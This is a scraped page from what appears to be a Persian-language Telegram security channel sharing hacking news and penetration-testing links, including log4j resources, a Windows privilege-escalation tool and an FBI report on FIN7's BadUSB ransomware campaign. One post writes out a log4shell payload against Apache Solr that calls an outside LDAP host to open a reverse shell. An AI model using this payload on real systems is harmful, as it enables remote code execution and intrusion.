امنیت اطلاعات
850 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
مرکز امنیت سایبری کانادا داکیومنت جالبی از نحوه ی رخ دادن حملات باج افزاری منتشر کرده


https://cyber.gc.ca/en/guidance/ransomware-playbook-itsm00099


#ransomware


@sec_nerd
apache solr EXP log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json


#log4j


@sec_nerd
اگر تاحالا در مورد log4j و اکسپلویتش نخوندید این مطلب خوبیه

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/


#log4j


@sec_nerd
افزونه ی burpsuite برای آسیب پذیری log4j

https://github.com/silentsignal/burp-log4shell


#log4j
#burpsuite

@sec_nerd
بدست آوردن نسخه ی جاوا برای تشخیص آسیب پذیر بودن در برابر حمله ی log4shell
با استفاده از برپ

لیست هدرها
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt

#log4j

@sec_nerd
اپلیکیشن جاوایی آسیب پذیر در برابر حمله ی log4shell

https://github.com/tothi/log4shell-vulnerable-app


#log4j


@sec_nerd
بالا بردن سطح دسترسی در ویندوز با استفاده از ابزار MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato


#windows
#privesc


@sec_nerd
👍4
گروه هکرهای شناخته شده ی FIN7 این بار با یک روش جدید اقدام به آلوده سازی اهداف خود کردند.
به گزارش FBI این گروه با ارسال Bad USB به شرکت های هدف قصد انتقال بدافزار خود به سیستم ها و ادامه ی حملات خود را داشتند.
شرکت های مذکور در حوزه های حمل و نقل، بیمه و صنایع نظامی فعالیت دارند.
این فلش با دو روش به شرکتها داده میشد: شرکتهای حوزه ی سلامت و مرتبط با وزرات بهداشت نامه ای در خصوص راهکارهای مقابله با کرونا و یک فلش دریافت میکردند و سایرین یک جعبه ی هدیه از سوی آمازون که یک گیفت کارت و فلش درون آن قرار داشت.

این bad USB پس از اتصال به سیستم در نقش یک کیبورد خود را رجیستر کرده و اقدام به ارسال دکمه های از پیش تعیین شده ی خودکار میکرد. این دکمه ها دستورات پاورشل را اجرا میکردند که در نهایت منجر به دانلود و اجرای بدافزار بر روی سیستم قربانی میشد.
پس از این بدافزار تلاش میکرد با بدست آوردن سطح دسترسی ادمین، سایر سیستم های شبکه را آلوده کند.

برند اکثر این فلش ها LilyGo بوده است.

https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/


#fin7
#malware
#news


@sec_nerd
👍4